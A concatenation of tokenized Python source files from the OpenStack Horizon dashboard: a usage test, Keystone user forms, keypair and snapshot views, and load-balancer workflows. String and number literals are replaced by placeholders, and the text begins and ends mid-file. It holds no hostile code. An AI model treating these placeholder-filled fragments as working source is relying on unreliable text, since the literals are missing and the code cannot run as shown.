context [ '<STR_LIT>' ] , usage . GlobalUsage ) ) <EOL> self . assertContains ( res , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( usage_obj . vcpus , <EOL> usage_obj . disk_gb_hours , <EOL> sizeformat . mbformat ( usage_obj . memory_mb ) , <EOL> usage_obj . vcpu_hours , <EOL> usage_obj . total_local_gb_usage ) ) <EOL> @ test . create_stubs ( { api . nova : ( '<STR_LIT>' , '<STR_LIT>' , ) , <EOL> api . keystone : ( '<STR_LIT>' , ) , <EOL> api . neutron : ( '<STR_LIT>' , ) , <EOL> api . network : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_usage_csv ( self ) : <EOL> now = timezone . now ( ) <EOL> usage_obj = [ api . nova . NovaUsage ( u ) for u in self . usages . list ( ) ] <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> api . nova . usage_list ( IsA ( http . HttpRequest ) , <EOL> datetime . datetime ( now . year , <EOL> now . month , <EOL> now . day , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> datetime . datetime ( now . year , <EOL> now . month , <EOL> now . day , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) ) . AndReturn ( usage_obj ) <EOL> api . nova . tenant_absolute_limits ( IsA ( http . HttpRequest ) ) . AndReturn ( self . limits [ '<STR_LIT>' ] ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , <EOL> '<STR_LIT>' ) . AndReturn ( True ) <EOL> api . network . tenant_floating_ip_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . floating_ips . list ( ) ) <EOL> api . network . security_group_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . q_secgroups . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> csv_url = reverse ( '<STR_LIT>' ) + "<STR_LIT>" <EOL> res = self . client . get ( csv_url ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( res . 
context [ '<STR_LIT>' ] , usage . GlobalUsage ) ) <EOL> hdr = '<STR_LIT>' <EOL> self . assertContains ( res , '<STR_LIT>' % ( hdr ) ) <EOL> for obj in usage_obj : <EOL> row = u'<STR_LIT>' . format ( obj . project_name , <EOL> obj . vcpus , <EOL> obj . memory_mb , <EOL> obj . disk_gb_hours , <EOL> obj . vcpu_hours ) <EOL> self . assertContains ( res , row ) </s>
<s> import logging <EOL> from django . forms import ValidationError <EOL> from django import http <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . decorators . debug import sensitive_variables <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import messages <EOL> from horizon . utils import validators <EOL> from openstack_dashboard import api <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class BaseUserForm ( forms . SelfHandlingForm ) : <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( BaseUserForm , self ) . __init__ ( request , * args , ** kwargs ) <EOL> project_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> user_id = kwargs [ '<STR_LIT>' ] . get ( '<STR_LIT:id>' , None ) <EOL> domain_id = kwargs [ '<STR_LIT>' ] . get ( '<STR_LIT>' , None ) <EOL> projects , has_more = api . keystone . tenant_list ( request , <EOL> domain = domain_id , <EOL> user = user_id ) <EOL> for project in projects : <EOL> if project . enabled : <EOL> project_choices . append ( ( project . id , project . name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = project_choices <EOL> def clean ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = super ( forms . Form , self ) . clean ( ) <EOL> if '<STR_LIT:password>' in data : <EOL> if data [ '<STR_LIT:password>' ] != data . get ( '<STR_LIT>' , None ) : <EOL> raise ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return data <EOL> ADD_PROJECT_URL = "<STR_LIT>" <EOL> class CreateUserForm ( BaseUserForm ) : <EOL> domain_id = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . HiddenInput ( ) ) <EOL> domain_name = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . HiddenInput ( ) ) <EOL> name = forms . CharField ( label = _ ( "<STR_LIT>" ) ) <EOL> email = forms . 
EmailField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False ) <EOL> password = forms . RegexField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) , <EOL> regex = validators . password_validator ( ) , <EOL> error_messages = { '<STR_LIT>' : validators . password_validator_msg ( ) } ) <EOL> confirm_password = forms . CharField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> project = forms . DynamicChoiceField ( label = _ ( "<STR_LIT>" ) , <EOL> add_item_link = ADD_PROJECT_URL ) <EOL> role_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> roles = kwargs . pop ( '<STR_LIT>' ) <EOL> super ( CreateUserForm , self ) . __init__ ( * args , ** kwargs ) <EOL> role_choices = [ ( role . id , role . name ) for role in roles ] <EOL> self . fields [ '<STR_LIT>' ] . choices = role_choices <EOL> if api . keystone . VERSIONS . active >= <NUM_LIT:3> : <EOL> readonlyInput = forms . TextInput ( attrs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . fields [ "<STR_LIT>" ] . widget = readonlyInput <EOL> self . fields [ "<STR_LIT>" ] . widget = readonlyInput <EOL> @ sensitive_variables ( '<STR_LIT:data>' ) <EOL> def handle ( self , request , data ) : <EOL> domain = api . keystone . get_default_domain ( self . request ) <EOL> try : <EOL> LOG . info ( '<STR_LIT>' % data [ '<STR_LIT:name>' ] ) <EOL> new_user = api . keystone . user_create ( request , <EOL> name = data [ '<STR_LIT:name>' ] , <EOL> email = data [ '<STR_LIT:email>' ] , <EOL> password = data [ '<STR_LIT:password>' ] , <EOL> project = data [ '<STR_LIT>' ] , <EOL> enabled = True , <EOL> domain = domain . id ) <EOL> messages . success ( request , <EOL> _ ( '<STR_LIT>' ) <EOL> % data [ '<STR_LIT:name>' ] ) <EOL> if data [ '<STR_LIT>' ] : <EOL> try : <EOL> api . keystone . 
add_tenant_user_role ( request , <EOL> data [ '<STR_LIT>' ] , <EOL> new_user . id , <EOL> data [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> return new_user <EOL> except Exception : <EOL> exceptions . handle ( request , _ ( '<STR_LIT>' ) ) <EOL> class UpdateUserForm ( BaseUserForm ) : <EOL> domain_id = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . HiddenInput ( ) ) <EOL> domain_name = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . HiddenInput ( ) ) <EOL> id = forms . CharField ( label = _ ( "<STR_LIT>" ) , widget = forms . HiddenInput ) <EOL> name = forms . CharField ( label = _ ( "<STR_LIT>" ) ) <EOL> email = forms . EmailField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False ) <EOL> password = forms . RegexField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) , <EOL> regex = validators . password_validator ( ) , <EOL> required = False , <EOL> error_messages = { '<STR_LIT>' : validators . password_validator_msg ( ) } ) <EOL> confirm_password = forms . CharField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) , <EOL> required = False ) <EOL> project = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( UpdateUserForm , self ) . __init__ ( request , * args , ** kwargs ) <EOL> if api . keystone . keystone_can_edit_user ( ) is False : <EOL> for field in ( '<STR_LIT:name>' , '<STR_LIT:email>' , '<STR_LIT:password>' , '<STR_LIT>' ) : <EOL> self . fields . pop ( field ) <EOL> if api . keystone . VERSIONS . active >= <NUM_LIT:3> : <EOL> readonlyInput = forms . TextInput ( attrs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . fields [ "<STR_LIT>" ] . widget = readonlyInput <EOL> self . fields [ "<STR_LIT>" ] . 
widget = readonlyInput <EOL> @ sensitive_variables ( '<STR_LIT:data>' , '<STR_LIT:password>' ) <EOL> def handle ( self , request , data ) : <EOL> user = data . pop ( '<STR_LIT:id>' ) <EOL> data . pop ( '<STR_LIT>' , None ) <EOL> data . pop ( '<STR_LIT>' ) <EOL> data . pop ( '<STR_LIT>' ) <EOL> try : <EOL> response = api . keystone . user_update ( request , user , ** data ) <EOL> messages . success ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> except Exception : <EOL> response = exceptions . handle ( request , ignore = True ) <EOL> messages . error ( request , _ ( '<STR_LIT>' ) ) <EOL> if isinstance ( response , http . HttpResponse ) : <EOL> return response <EOL> else : <EOL> return True </s>
"""Views for creating, importing and downloading nova keypairs."""

from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django import http
from django.template.defaultfilters import slugify
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from django.views.generic import View

from horizon import exceptions
from horizon import forms

from openstack_dashboard import api
from openstack_dashboard.dashboards.project.access_and_security.keypairs \
    import forms as project_forms


class CreateView(forms.ModalFormView):
    form_class = project_forms.CreateKeypair
    template_name = '<STR_LIT>'
    success_url = '<STR_LIT>'

    def get_success_url(self):
        # Redirect to the download page for the keypair just named.
        return reverse(self.success_url,
                       kwargs={"<STR_LIT>": self.request.POST['<STR_LIT:name>']})


class ImportView(forms.ModalFormView):
    form_class = project_forms.ImportKeypair
    template_name = '<STR_LIT>'
    success_url = reverse_lazy('<STR_LIT>')

    def get_object_id(self, keypair):
        return keypair.name


class DownloadView(TemplateView):
    def get_context_data(self, keypair_name=None):
        return {'<STR_LIT>': keypair_name}
    template_name = '<STR_LIT>'


class GenerateView(View):
    """Generate a keypair server-side and stream the private key back."""

    def get(self, request, keypair_name=None):
        try:
            keypair = api.nova.keypair_create(request, keypair_name)
        except Exception:
            # exceptions.handle with redirect raises, aborting the view.
            redirect = reverse('<STR_LIT>')
            exceptions.handle(self.request,
                              _('<STR_LIT>'),
                              redirect=redirect)
        response = http.HttpResponse(mimetype='<STR_LIT>')
        response['<STR_LIT>'] = '<STR_LIT>' % slugify(keypair.name)
        response.write(keypair.private_key)
        response['<STR_LIT>'] = str(len(response.content))
        return response
from django.utils.translation import ugettext_lazy as _

import horizon

from openstack_dashboard.dashboards.project import dashboard


class Databases(horizon.Panel):
    """Project-dashboard panel for the database service."""
    name = _("<STR_LIT>")
    slug = '<STR_LIT>'
    permissions = ('<STR_LIT>',)


dashboard.Project.register(Databases)
"""View for creating a snapshot of a running instance."""

from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _

from horizon import exceptions
from horizon import forms

from openstack_dashboard import api
from openstack_dashboard.dashboards.project.images_and_snapshots.snapshots \
    import forms as project_forms


class CreateView(forms.ModalFormView):
    form_class = project_forms.CreateSnapshot
    template_name = '<STR_LIT>'
    success_url = reverse_lazy("<STR_LIT>")

    def get_object(self):
        """Fetch (and memoize) the instance being snapshotted."""
        if not hasattr(self, "<STR_LIT>"):
            try:
                self._object = api.nova.server_get(self.request,
                                                   self.kwargs["<STR_LIT>"])
            except Exception:
                # handle() with redirect raises, leaving the view.
                redirect = reverse('<STR_LIT>')
                exceptions.handle(self.request,
                                  _("<STR_LIT>"),
                                  redirect=redirect)
        return self._object

    def get_initial(self):
        return {"<STR_LIT>": self.kwargs["<STR_LIT>"]}

    def get_context_data(self, **kwargs):
        context = super(CreateView, self).get_context_data(**kwargs)
        context['<STR_LIT>'] = self.get_object()
        return context
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon . utils import fields <EOL> from horizon . utils import validators <EOL> from horizon import workflows <EOL> from openstack_dashboard import api <EOL> AVAILABLE_PROTOCOLS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> AVAILABLE_METHODS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class AddPoolAction ( workflows . Action ) : <EOL> name = forms . CharField ( max_length = <NUM_LIT> , label = _ ( "<STR_LIT:Name>" ) ) <EOL> description = forms . CharField ( <EOL> initial = "<STR_LIT>" , required = False , <EOL> max_length = <NUM_LIT> , label = _ ( "<STR_LIT>" ) ) <EOL> provider = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) , required = False ) <EOL> subnet_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> protocol = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> lb_method = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> admin_state_up = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddPoolAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> tenant_id = request . user . tenant_id <EOL> subnet_id_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> try : <EOL> networks = api . neutron . network_list_for_tenant ( request , tenant_id ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> networks = [ ] <EOL> for n in networks : <EOL> for s in n [ '<STR_LIT>' ] : <EOL> subnet_id_choices . append ( ( s . id , s . cidr ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = subnet_id_choices <EOL> protocol_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> [ protocol_choices . append ( ( p , p ) ) for p in AVAILABLE_PROTOCOLS ] <EOL> self . fields [ '<STR_LIT>' ] . 
choices = protocol_choices <EOL> lb_method_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> [ lb_method_choices . append ( ( m , m ) ) for m in AVAILABLE_METHODS ] <EOL> self . fields [ '<STR_LIT>' ] . choices = lb_method_choices <EOL> try : <EOL> if api . neutron . is_extension_supported ( request , '<STR_LIT>' ) : <EOL> provider_list = api . neutron . provider_list ( request ) <EOL> providers = [ p for p in provider_list <EOL> if p [ '<STR_LIT>' ] == '<STR_LIT>' ] <EOL> else : <EOL> providers = None <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> providers = [ ] <EOL> if providers : <EOL> default_providers = [ p for p in providers if p . get ( '<STR_LIT:default>' ) ] <EOL> if default_providers : <EOL> default_provider = default_providers [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> else : <EOL> default_provider = None <EOL> provider_choices = [ ( p [ '<STR_LIT:name>' ] , p [ '<STR_LIT:name>' ] ) for p in providers <EOL> if p [ '<STR_LIT:name>' ] != default_provider ] <EOL> if default_provider : <EOL> provider_choices . insert ( <EOL> <NUM_LIT:0> , ( default_provider , <EOL> _ ( "<STR_LIT>" ) % default_provider ) ) <EOL> else : <EOL> if providers is None : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> else : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> provider_choices = [ ( '<STR_LIT>' , msg ) ] <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs [ '<STR_LIT>' ] = True <EOL> self . fields [ '<STR_LIT>' ] . choices = provider_choices <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AddPoolStep ( workflows . 
Step ) : <EOL> action_class = AddPoolAction <EOL> contributes = ( "<STR_LIT:name>" , "<STR_LIT:description>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddPoolStep , self ) . contribute ( data , context ) <EOL> if data : <EOL> return context <EOL> class AddPool ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddPoolStep , ) <EOL> def format_status_message ( self , message ) : <EOL> name = self . context . get ( '<STR_LIT:name>' ) <EOL> return message % name <EOL> def handle ( self , request , context ) : <EOL> try : <EOL> api . lbaas . pool_create ( request , ** context ) <EOL> return True <EOL> except Exception : <EOL> return False <EOL> class AddVipAction ( workflows . Action ) : <EOL> name = forms . CharField ( max_length = <NUM_LIT> , label = _ ( "<STR_LIT:Name>" ) ) <EOL> description = forms . CharField ( <EOL> initial = "<STR_LIT>" , required = False , <EOL> max_length = <NUM_LIT> , label = _ ( "<STR_LIT>" ) ) <EOL> floatip_address = forms . ChoiceField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . Select ( attrs = { '<STR_LIT>' : '<STR_LIT>' } ) , <EOL> required = False ) <EOL> other_address = fields . IPField ( required = False , <EOL> initial = "<STR_LIT>" , <EOL> version = fields . IPv4 , <EOL> mask = False ) <EOL> protocol_port = forms . IntegerField ( label = _ ( "<STR_LIT>" ) , min_value = <NUM_LIT:1> , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> validators = [ validators . validate_port_range ] ) <EOL> protocol = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> session_persistence = forms . 
ChoiceField ( <EOL> required = False , initial = { } , label = _ ( "<STR_LIT>" ) ) <EOL> cookie_name = forms . CharField ( <EOL> initial = "<STR_LIT>" , required = False , <EOL> max_length = <NUM_LIT> , label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> connection_limit = forms . IntegerField ( <EOL> required = False , min_value = - <NUM_LIT:1> , label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> admin_state_up = forms . BooleanField ( <EOL> label = _ ( "<STR_LIT>" ) , initial = True , required = False ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddVipAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> args [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> protocol_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> [ protocol_choices . append ( ( p , p ) ) for p in AVAILABLE_PROTOCOLS ] <EOL> self . fields [ '<STR_LIT>' ] . choices = protocol_choices <EOL> session_persistence_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> for mode in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> session_persistence_choices . append ( ( mode , mode ) ) <EOL> self . fields [ <EOL> '<STR_LIT>' ] . choices = session_persistence_choices <EOL> floatip_address_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> self . fields [ '<STR_LIT>' ] . choices = floatip_address_choices <EOL> def clean ( self ) : <EOL> cleaned_data = super ( AddVipAction , self ) . clean ( ) <EOL> if ( cleaned_data . get ( '<STR_LIT>' ) == '<STR_LIT>' and <EOL> not cleaned_data . get ( '<STR_LIT>' ) ) : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = self . 
error_class ( [ msg ] ) <EOL> return cleaned_data <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AddVipStep ( workflows . Step ) : <EOL> action_class = AddVipAction <EOL> depends_on = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> contributes = ( "<STR_LIT:name>" , "<STR_LIT:description>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddVipStep , self ) . contribute ( data , context ) <EOL> return context <EOL> class AddVip ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddVipStep , ) <EOL> def format_status_message ( self , message ) : <EOL> name = self . context . get ( '<STR_LIT:name>' ) <EOL> return message % name <EOL> def handle ( self , request , context ) : <EOL> if context [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> context [ '<STR_LIT:address>' ] = context [ '<STR_LIT>' ] <EOL> else : <EOL> if not context [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . failure_message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return False <EOL> else : <EOL> context [ '<STR_LIT:address>' ] = context [ '<STR_LIT>' ] <EOL> try : <EOL> pool = api . lbaas . pool_get ( request , context [ '<STR_LIT>' ] ) <EOL> context [ '<STR_LIT>' ] = pool [ '<STR_LIT>' ] <EOL> except Exception : <EOL> context [ '<STR_LIT>' ] = None <EOL> self . 
failure_message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return False <EOL> if context [ '<STR_LIT>' ] : <EOL> stype = context [ '<STR_LIT>' ] <EOL> if stype == '<STR_LIT>' : <EOL> cookie = context [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = { '<STR_LIT:type>' : stype , <EOL> '<STR_LIT>' : cookie } <EOL> else : <EOL> context [ '<STR_LIT>' ] = { '<STR_LIT:type>' : stype } <EOL> else : <EOL> context [ '<STR_LIT>' ] = { } <EOL> try : <EOL> api . lbaas . vip_create ( request , ** context ) <EOL> return True <EOL> except Exception : <EOL> return False <EOL> class AddMemberAction ( workflows . Action ) : <EOL> pool_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> members = forms . MultipleChoiceField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = True , <EOL> initial = [ "<STR_LIT:default>" ] , <EOL> widget = forms . CheckboxSelectMultiple ( ) , <EOL> error_messages = { '<STR_LIT>' : <EOL> _ ( '<STR_LIT>' ) } , <EOL> help_text = _ ( "<STR_LIT>" ) ) <EOL> weight = forms . IntegerField ( max_value = <NUM_LIT> , min_value = <NUM_LIT:0> , label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> protocol_port = forms . IntegerField ( label = _ ( "<STR_LIT>" ) , min_value = <NUM_LIT:1> , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> validators = [ validators . validate_port_range ] ) <EOL> admin_state_up = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddMemberAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> pool_id_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> try : <EOL> pools = api . lbaas . pools_get ( request ) <EOL> except Exception : <EOL> pools = [ ] <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> pools = sorted ( pools , <EOL> key = lambda pool : pool . 
name ) <EOL> for p in pools : <EOL> pool_id_choices . append ( ( p . id , p . name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = pool_id_choices <EOL> members_choices = [ ] <EOL> try : <EOL> servers , has_more = api . nova . server_list ( request ) <EOL> except Exception : <EOL> servers = [ ] <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> if len ( servers ) == <NUM_LIT:0> : <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> return <EOL> for m in servers : <EOL> members_choices . append ( ( m . id , m . name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = sorted ( <EOL> members_choices , <EOL> key = lambda member : member [ <NUM_LIT:1> ] ) <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AddMemberStep ( workflows . Step ) : <EOL> action_class = AddMemberAction <EOL> contributes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddMemberStep , self ) . contribute ( data , context ) <EOL> return context <EOL> class AddMember ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddMemberStep , ) <EOL> def handle ( self , request , context ) : <EOL> for m in context [ '<STR_LIT>' ] : <EOL> params = { '<STR_LIT>' : m } <EOL> try : <EOL> plist = api . neutron . 
port_list ( request , ** params ) <EOL> except Exception : <EOL> return False <EOL> if plist : <EOL> context [ '<STR_LIT:address>' ] = plist [ <NUM_LIT:0> ] . fixed_ips [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> try : <EOL> context [ '<STR_LIT>' ] = api . lbaas . member_create ( <EOL> request , ** context ) . id <EOL> except Exception : <EOL> return False <EOL> return True <EOL> class AddMonitorAction ( workflows . Action ) : <EOL> type = forms . ChoiceField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> choices = [ ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:http>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) ] , <EOL> widget = forms . Select ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:type>' <EOL> } ) ) <EOL> delay = forms . IntegerField ( <EOL> min_value = <NUM_LIT:1> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> timeout = forms . IntegerField ( <EOL> min_value = <NUM_LIT:1> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> max_retries = forms . IntegerField ( <EOL> max_value = <NUM_LIT:10> , min_value = <NUM_LIT:1> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> http_method = forms . ChoiceField ( <EOL> initial = "<STR_LIT:GET>" , <EOL> required = False , <EOL> choices = [ ( '<STR_LIT:GET>' , _ ( '<STR_LIT:GET>' ) ) ] , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" ) , <EOL> widget = forms . Select ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:type>' , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) ) <EOL> url_path = forms . CharField ( <EOL> initial = "<STR_LIT:/>" , <EOL> required = False , <EOL> max_length = <NUM_LIT> , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . 
